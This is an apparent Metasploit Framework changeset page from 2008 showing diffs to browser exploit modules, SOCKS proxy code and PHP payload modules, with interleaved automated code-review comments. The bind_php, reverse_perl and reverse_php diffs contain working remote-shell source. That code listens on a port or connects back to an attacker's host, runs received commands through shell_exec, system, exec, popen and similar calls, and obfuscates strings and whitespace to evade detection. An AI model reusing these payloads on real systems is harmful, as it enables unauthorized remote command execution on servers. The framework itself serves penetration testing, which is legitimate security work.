Changeset 5546
- Timestamp:
- 06/30/08 20:44:56 (4 months ago)
- Files:
-
- framework3/trunk/lib/msf/core/exploit/http.rb (modified) (2 diffs)
- framework3/trunk/lib/msf/core/payload/php.rb (added)
- framework3/trunk/lib/rex/exploitation/obfuscatejs.rb (modified) (1 diff)
- framework3/trunk/lib/rex/socket/comm/local.rb (modified) (6 diffs)
- framework3/trunk/modules/auxiliary/server/browser_autopwn.rb (added)
- framework3/trunk/modules/auxiliary/server/capture/http.rb (modified) (1 diff)
- framework3/trunk/modules/encoders/php (added)
- framework3/trunk/modules/encoders/php/base64.rb (added)
- framework3/trunk/modules/exploits/multi/browser/firefox_queryinterface.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/osx/armle/safari_libtiff.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/osx/browser/safari_libtiff.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/apple_quicktime_rtsp.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_067_keyframe.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/novelliprint_getdriversettings.rb (modified) (1 diff)
- framework3/trunk/modules/payloads/singles/php/bind_php.rb (modified) (5 diffs)
- framework3/trunk/modules/payloads/singles/php/reverse_perl.rb (modified) (4 diffs)
- framework3/trunk/modules/payloads/singles/php/reverse_php.rb (modified) (6 diffs)
framework3/trunk/lib/msf/core/exploit/http.rb
r5429 r5546 444 444 end 445 445 446 446 447 # 447 448 # Sends a 302 redirect relative to our base path … … 449 450 def send_local_redirect(cli, location) 450 451 send_redirect(cli, get_resource + location) 452 end 453 454 455 # 456 # Sends a 404 457 # 458 def send_not_found(cli) 459 resp_404 = create_response(404, 'Not Found') 460 resp_404.body = %Q{ 461 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 462 <html><head> 463 <title>404 Not Found</title> 464 </head><body> 465 <h1>Not Found</h1> 466 <p>The requested URL /404.html was not found on this server.</p> 467 <hr> 468 <address>Apache/2.2.9 (Unix) Server at #{datastore['LHOST']} Port #{datastore['SRVPORT']}</address> 469 </body></html> 470 } 471 472 cli.send_response(resp_404) 451 473 end 452 474 framework3/trunk/lib/rex/exploitation/obfuscatejs.rb
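Review bot: The new `send_not_found` (new lines 455-473) is documented only by `# Sends a 404`; give it a comment a module author can rely on, such as `# Sends a canned 404 page to +cli+. The body is a fixed HTML document whose Address line interpolates datastore['LHOST'] and datastore['SRVPORT'] into a hard-coded "Apache/2.2.9 (Unix)" string; nothing in it is taken from the request.` If either datastore key is unset the interpolation silently yields an empty string, so the comment (or a guard before `create_response`) should say whether that is intended. The enclosing mixin continues outside the section.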
r5506 r5546 40 40 # 41 41 def sym(name) 42 @dynsym[name] 42 @dynsym[name] || name 43 43 end 44 44 framework3/trunk/lib/rex/socket/comm/local.rb
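Review bot: `sym` now falls back to the original `name` when `@dynsym` has no entry (new line 42), which turns a missing-table lookup into a silent pass-through; the empty `#` comment above the method should say so, e.g. `# Returns the replacement symbol recorded for +name+, or +name+ unchanged when none has been registered.` If callers expect every name to be registered, a lookup miss will no longer surface, so consider whether that case deserves a debug log line.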
r5537 r5546 214 214 def self.proxy (sock, type, host, port) 215 215 216 #$stdout.print("PROXY\n") 216 217 case type.downcase 217 218 when 'socks4' … … 219 220 size = sock.put(setup) 220 221 if (size != setup.length) 221 raise ArgumentError, "Wrote less data than expected to the socks proxy"222 end 223 222 raise ArgumentError, "Wrote less data than expected to the socks4 proxy" 223 end 224 224 225 begin 225 226 ret = sock.get_once(8, 30) … … 227 228 raise Rex::ConnectionRefused.new(host, port), caller 228 229 end 229 230 230 231 if (ret.nil? or ret.length < 8) 231 232 raise ArgumentError, 'SOCKS4 server did not respond with a proper response' … … 235 236 end 236 237 when 'socks5' 237 # TODO: add dns lookups through socks5238 238 auth_methods = [5,1,0].pack('CCC') 239 239 size = sock.put(auth_methods) 240 240 if (size != auth_methods.length) 241 raise ArgumentError, "Wrote less data than expected to the socks proxy"241 raise ArgumentError, "Wrote less data than expected to the socks5 proxy" 242 242 end 243 243 response = sock.get_once(2,30) … … 246 246 end 247 247 248 setup = [5,1,0,1].pack('CCCC') + Socket.gethostbyname(host)[3] + [port.to_i].pack('n') 248 if (Rex::Socket.is_ipv4?(host)) 249 addr = Rex::Socket.gethostbyname(host)[3] 250 setup = [5,1,0,1].pack('C4') + addr + [port.to_i].pack('n') 251 elsif (Rex::Socket.support_ipv6? and Rex::Socket.is_ipv6?(host)) 252 # IPv6 stuff all untested 253 addr = Rex::Socket.gethostbyname(host)[3] 254 setup = [5,1,0,4].pack('C4') + addr + [port.to_i].pack('n') 255 else 256 # Then it must be a domain name. 257 # Unfortunately, it looks like the host has always been 258 # resolved by the time it gets here, so this code never runs. 
259 setup = [5,1,0,3].pack('C4') + [host.length].pack('C') + host + [port.to_i].pack('n') 260 end 261 249 262 size = sock.put(setup) 250 263 if (size != setup.length) 251 raise ArgumentError, "Wrote less data than expected to the socks proxy"252 end 253 264 raise ArgumentError, "Wrote less data than expected to the socks5 proxy" 265 end 266 254 267 begin 255 268 response = sock.get_once(10, 30) … … 257 270 raise Rex::ConnectionRefused.new(host, port), caller 258 271 end 259 260 if (response.nil? or response.length < 8)272 273 if (response.nil? or response.length < 10) 261 274 raise ArgumentError, 'SOCKS5 server did not respond with a proper response' 262 275 end framework3/trunk/modules/auxiliary/server/capture/http.rb
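Review bot: In the new socks5 CONNECT path the reply is read with `sock.get_once(10, 30)` and accepted once `response.length >= 10` (new lines 268-275), but that fixed size matches only an ATYP 1 (IPv4) reply; a server that answers with ATYP 4 (IPv6, 22 bytes) or ATYP 3 (domain, 7 + length bytes) leaves the tail of its reply unread on the socket, where it would presumably be handed to the caller as application data, and the request can now carry exactly those address types (new lines 248-260). Read the 4-byte header first, then the remainder sized by the ATYP byte, and confirm the second byte (REP) is 0 before treating the tunnel as established; the handling after line 275 is outside the section, so part of this may already be covered there. Two smaller points: `#$stdout.print("PROXY\n")` at new line 216 is commented-out debug output that should be dropped rather than committed, and new line 251 uses `and` where `&&` is meant (`elsif (Rex::Socket.support_ipv6? && Rex::Socket.is_ipv6?(host))`). `proxy` starts at line 214 and its end is outside the section.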
r5542 r5546 135 135 os_arch = 'armle' 136 136 when /Mac OS X/ 137 os = 'Mac'137 os_name = 'Mac' 138 138 end 139 139 framework3/trunk/modules/exploits/multi/browser/firefox_queryinterface.rb
r4646 r5546 71 71 return if ((p = regenerate_payload(cli)) == nil) 72 72 73 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")73 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 74 74 send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) 75 75 handler(cli) framework3/trunk/modules/exploits/osx/armle/safari_libtiff.rb
r5151 r5546 86 86 t = target 87 87 88 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")88 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 89 89 90 90 # Transmit the compressed response to the client framework3/trunk/modules/exploits/osx/browser/safari_libtiff.rb
r5186 r5546 74 74 t = target 75 75 76 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")76 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 77 77 78 78 # Transmit the compressed response to the client framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
r5497 r5546 291 291 return if ((p = regenerate_payload(cli)) == nil) 292 292 293 print_status("Sending ANI fileto #{cli.peerhost}:#{cli.peerport}...")293 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 294 294 295 295 # Transmit the compressed response to the client framework3/trunk/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
r4645 r5546 67 67 content << "src=\"rtsp://#{cruft}:#{sploit}\" />\n" 68 68 69 print_status("Sending exploitto #{client.peerhost}:#{client.peerport}...")69 print_status("Sending #{self.name} to #{client.peerhost}:#{client.peerport}...") 70 70 71 71 send_response(client, content, { 'Content-Type' => 'text/html' }) framework3/trunk/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
r4645 r5546 100 100 "</html>" 101 101 102 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")102 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 103 103 104 104 # Transmit the response to the client framework3/trunk/modules/exploits/windows/browser/ms06_067_keyframe.rb
r5364 r5546 73 73 return if ((p = regenerate_payload(cli)) == nil) 74 74 75 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")75 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 76 76 77 77 # This is taken directly from Alex's exploit -- all credit goes to him. framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb
r5496 r5546 130 130 content = Rex::Text.randomize_space(content) 131 131 132 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")132 print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") 133 133 134 134 # Transmit the response to the client framework3/trunk/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
r5533 r5546 107 107 content = Rex::Text.randomize_space(content) 108 108 109 print_status("Sending exploitto #{cli.peerhost}:#{cli.peerport}...")109 print_status("Sending #{self.name}to #{cli.peerhost}:#{cli.peerport}...") 110 110 111 111 # Transmit the response to the client framework3/trunk/modules/payloads/singles/php/bind_php.rb
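Review bot: The new status message on line 109 is missing the space between the module name and `to`, so the output runs the two words together (constructed example: "Sending Foo Barto 10.0.0.1:80..."); every other module in this changeset uses `#{self.name} to`. Change it to `print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")`. The enclosing method starts and ends outside the section.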
r5138 r5546 12 12 13 13 require 'msf/core' 14 require 'msf/core/payload/php' 14 15 require 'msf/core/handler/bind_tcp' 15 16 require 'msf/base/sessions/command_shell' … … 23 24 24 25 include Msf::Payload::Single 26 include Msf::Payload::Php 25 27 26 28 def initialize(info = {}) … … 29 31 'Version' => '$Revision$', 30 32 'Description' => 'Listen for a connection and spawn a command shell via php (persistent)', 31 'Author' => [' diaul <diaul@devilopers.org>',],33 'Author' => ['egypt', 'diaul <diaul@devilopers.org>',], 32 34 'License' => BSD_LICENSE, 33 35 'Platform' => 'php', … … 48 50 # 49 51 def php_bind_shell 52 53 dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4); 50 54 shell = <<-END_OF_PHP_CODE 51 error_reporting(E_ALL); 52 53 set_time_limit(0); 54 ob_implicit_flush(); 55 #{php_preamble({:disabled_varname => dis})} 56 $port=#{datastore['LPORT']}; 55 57 56 $port = #{datastore['LPORT']}; 58 $scl='socket_create_listen'; 59 if(is_callable($scl)&&!in_array($scl,#{dis})){ 60 $sock=$scl($port); 61 }else{ 62 $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); 63 $ret=socket_bind($sock,0,$port); 64 $ret=socket_listen($sock,5); 65 } 66 $msgsock=socket_accept($sock); 67 socket_close($sock); 57 68 58 $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); 59 $ret = socket_bind($sock, 0, $port); 60 $ret = socket_listen($sock, 5); 61 $msgsock = socket_accept($sock); 62 63 while (true) 69 while(FALSE!==socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL)) 64 70 { 65 $command = socket_read($msgsock, 2048, PHP_NORMAL_READ); 66 $output = shell_exec(substr($command, 0, -1)); 67 socket_write($msgsock, $output, strlen($output)); 68 } 69 70 socket_close($sock); 71 72 $c=socket_read($msgsock,2048,PHP_NORMAL_READ); 73 if(FALSE===$c){break;} 74 #{php_system_block({:cmd_varname=>"$c", :output_varname=>"$o", :disabled_varname => dis})} 75 socket_write($msgsock,$o,strlen($o)); 76 } 77 socket_close($msgsock); 71 78 END_OF_PHP_CODE 72 79 73 80 return shell 74 75 81 end 76 77 82 78 83 # … 
… 82 87 return super + php_bind_shell 83 88 end 84 85 89 86 90 end framework3/trunk/modules/payloads/singles/php/reverse_perl.rb
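Review bot: The new local `dis` on line 53 is the PHP variable name handed to both `php_preamble` and `php_system_block` as `:disabled_varname` (presumably the list of disabled PHP functions) and is also referenced directly by the heredoc on line 59 (`in_array($scl,#{dis})`), so all three uses must agree; say so where it is defined, e.g. `# PHP variable that will hold the disabled-functions list; must match what php_preamble and php_system_block are given and the in_array check below`. The same line ends with a stray `;` — `dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)`. `php_bind_shell` starts at line 51 and ends at line 81 inside the section; `generate` (lines 87-88) starts outside it.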
r4419 r5546 1 1 ## 2 # $Id :$2 # $Id$ 3 3 ## 4 4 … … 12 12 13 13 require 'msf/core' 14 require 'msf/core/payload/php' 14 15 require 'msf/core/handler/reverse_tcp' 15 16 require 'msf/base/sessions/command_shell' … … 23 24 24 25 include Msf::Payload::Single 26 include Msf::Payload::Php 25 27 26 28 def initialize(info = {}) … … 48 50 # 49 51 def generate 50 return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'))" 52 buf = "#{php_preamble}" 53 buf += "$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');" 54 buf += "#{php_system_block({:cmd_varname=>"$c"})}" 55 return super + buf 56 51 57 end 52 58 framework3/trunk/modules/payloads/singles/php/reverse_php.rb
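Review bot: `generate` (new lines 52-56) builds `buf` by interpolating two method results into otherwise empty strings and appending with `+=`, which allocates a fresh string at each step; `"#{php_preamble}"` is just `php_preamble` if that helper returns a String. Written as appends it reads `buf = "#{php_preamble}$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');"`, then `buf << php_system_block({:cmd_varname=>"$c"}).to_s`, then `super + buf`, which also removes the explicit `return` and the blank line before `end`. A one-line comment naming the three pieces being concatenated would help, since the PHP text is assembled by helpers outside this file.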
r5461 r5546 12 12 13 13 require 'msf/core' 14 require 'msf/core/payload/php' 14 15 require 'msf/core/handler/reverse_tcp' 15 16 require 'msf/base/sessions/command_shell' … … 23 24 24 25 include Msf::Payload::Single 26 include Msf::Payload::Php 25 27 26 28 def initialize(info = {}) … … 45 47 46 48 # 47 # PHP Reverse Shell completely without quotes. Strings and regexes48 # are replaced with chr() equivalents and the IP address to connect to is49 # replaced with integer equivalent wrapped in long2ip().50 #51 # Attempts to make a connection back to the attacker using fsockopen or52 # socket_create and associated functions. Then attempts to execute a53 # system command with the following functions, in order:54 # - shell_exec55 # - passthru56 # - system57 # - exec58 # - proc_open59 # - popen60 #61 49 # Issues 62 50 # - Since each command is executed in a new shell, 'cd' does nothing. … … 65 53 # circumvent safe mode. 66 54 # - Should this add '2>&1' to the end of the executed command to avoid 67 # logging suspicious error messages? 55 # logging suspicious error messages? I'm afraid this will break 56 # the payload, especially on Windows, but I also don't like my tools 57 # ratting on me to the administrator. 
68 58 # 69 59 def php_reverse_shell … … 77 67 port = datastore['LPORT'] 78 68 end 69 exec_funcname = Rex::Text.rand_text_alpha(5) 79 70 80 #81 # The regex looks like this unobfuscated:82 # preg_replace('/[, ]+/', ',', $disabled);83 #84 71 shell=<<-END_OF_PHP_CODE 85 72 $ipaddr=long2ip(#{ipaddr}); 86 73 $port=#{port}; 87 $_=chr(95);$a=chr(97);$b=chr(98);$c=chr(99);$d=chr(100);$e=chr(101); 88 $f=chr(102);$h=chr(104);$i=chr(105);$k=chr(107);$l=chr(108);$m=chr(109); 89 $n=chr(110);$o=chr(111);$p=chr(112);$r=chr(114);$s=chr(115);$t=chr(116); 90 $u=chr(117);$x=chr(120);$y=chr(121); 91 $disabled=@ini_get($d.$i.$s.$a.$b.$l.$e.$_.$f.$u.$n.$c.$t.$i.$o.$n.$s); 92 if(!empty($disabled)){ 93 $disabled=preg_replace(chr(47).chr(91).chr(44).chr(32).chr(93).chr(43).chr(47),chr(44),$disabled); 94 $disabled=explode(chr(44),$disabled); 95 $disabled=array_map($t.$r.$i.$m,$disabled); 96 }else{ 97 $disabled=array(); 98 } 99 @set_time_limit(0); 100 @ignore_user_abort(1); 101 @ini_set($m.$a.$x.$_.$e.$x.$e.$c.$u.$t.$i.$o.$n.$_.$t.$i.$m.$e,0); 102 function myexec($cmd){ 103 global$disabled,$_,$a,$c,$e,$h,$m,$n,$o,$p,$r,$s,$t,$u,$x,$y; 104 if(is_callable($s.$h.$e.$l.$l.$_.$e.$x.$e.$c)and!in_array($s.$h.$e.$l.$l.$_.$e.$x.$e.$c,$disabled)){ 105 $output=shell_exec($cmd); 106 return$output; 107 }elseif(is_callable($p.$a.$s.$s.$t.$h.$r.$u)and!in_array($p.$a.$s.$s.$t.$h.$r.$u,$disabled)){ 108 ob_start(); 109 passthru($cmd); 110 $output=ob_get_contents(); 111 ob_end_clean(); 112 return$output; 113 }elseif(is_callable($s.$y.$s.$t.$e.$m)and!in_array($s.$y.$s.$t.$e.$m,$disabled)){ 114 ob_start(); 115 system($cmd); 116 $output=ob_get_contents(); 117 ob_end_clean(); 118 return$output; 119 }elseif(is_callable($e.$x.$e.$c)and!in_array($e.$x.$e.$c,$disabled)){ 120 $output=array(); 121 exec($cmd,$output); 122 $output=join(chr(10),$output).chr(10); 123 return$output; 124 }elseif(is_callable($p.$r.$o.$c.$_.$o.$p.$e.$n)and!in_array($p.$r.$o.$c.$_.$o.$p.$e.$n,$disabled)){ 125 
$handle=proc_open($cmd,array(array(pipe,r),array(pipe,w),array(pipe,w)),$pipes); 126 $output=NULL; 127 while(!feof($pipes[1])){ 128 $output.=fread($pipes[1],1024); 129 } 130 @proc_close($handle); 131 return$output; 132 }elseif(is_callable($p.$o.$p.$e.$n)and!in_array($p.$o.$p.$e.$n,$disabled)){ 133 $fp=popen($cmd,r); 134 $output=NULL; 135 if(is_resource($fp)){ 136 while(!feof($fp)){ 137 $output.=fread($fp,1024); 138 } 139 } 140 @pclose($fp); 141 return$output; 142 }else{ 143 return false; 144 } 145 } 146 $command=NULL; 147 $nofuncs=$n.$o.chr(32).$e.$x.$e.$c.chr(32).$f.$u.$n.$c.$t.$i.$o.$n.$s.chr(32).chr(61).chr(40); 148 if(is_callable($f.$s.$o.$c.$k.$o.$p.$e.$n)and!in_array($f.$s.$o.$c.$k.$o.$p.$e.$n,$disabled)){ 149 $sock=fsockopen($ipaddr,$port); 150 while($cmd=fread($sock,2048)){ 151 $output=myexec(substr($cmd,0,-1)); 152 if($output===false){ 153 fwrite($sock,$nofuncs); 74 #{php_preamble({:disabled_varname => "$dis"})} 75 76 if(!function_exists('myexec')){function myexec($c){ 77 global$dis; 78 #{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})} 79 return$o; 80 }} 81 $nofuncs='no exec functions'; 82 if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ 83 $s=fsockopen($ipaddr,$port); 84 while($c=fread($s,2048)){ 85 $out=myexec(substr($c,0,-1)); 86 if($out===false){ 87 fwrite($s,$nofuncs); 154 88 break; 155 89 } 156 fwrite($s ock,$output);90 fwrite($s,$out); 157 91 } 158 fclose($s ock);92 fclose($s); 159 93 }else{ 160 $sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); 161 socket_connect($sock,$ipaddr,$port); 162 while($cmd=socket_read($sock,2048)){ 163 $output=myexec(substr($cmd,0,-1)); 164 if($output===false){ 165 socket_write($sock,$nofuncs); 94 $s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP); 95 socket_connect($s,$ipaddr,$port); 96 socket_write($s,"socket_create"); 97 while($c=socket_read($s,2048)){ 98 $out=myexec(substr($c,0,-1)); 99 if($out===false){ 100 socket_write($s,$nofuncs); 166 101 break; 167 102 } 168 
socket_write($s ock,$output,strlen($output));103 socket_write($s,$out,strlen($out)); 169 104 } 170 socket_close($s ock);105 socket_close($s); 171 106 } 172 107 END_OF_PHP_CODE 173 108 174 109 # randomize the spaces a bit 175 shell.gsub!(/\s+/) { |s| 176 len = rand(5)+2 177 set = "\x09\x20\x0a" 178 buf = '' 179 180 while (buf.length < len) 181 buf << set[rand(set.length)].chr 182 end 183 184 buf 185 } 110 Rex::Text.randomize_space(shell) 186 111 187 112 return shell … … 195 120 end 196 121 197 198 122 end 199 123
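Review bot: `exec_funcname = Rex::Text.rand_text_alpha(5)` (new line 69) is assigned but never referenced in the rest of `php_reverse_shell`, which declares and calls `myexec` by its literal name (new lines 76-85); drop the dead assignment. On new line 110 the return value of `Rex::Text.randomize_space(shell)` is discarded, so unless that helper mutates its argument in place the `# randomize the spaces a bit` comment above it no longer describes what happens; the other modules in this changeset assign its result (`content = Rex::Text.randomize_space(content)`). The commit also removed the sentences that said what the method does, leaving the comment block opening with `# Issues`; restore a one-line purpose statement such as `# Builds the PHP reverse-shell source: connects back to the configured host and port and runs each received line through php_system_block.` `php_reverse_shell` starts at line 59 inside the section and its closing `end` lies past the elided lines.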
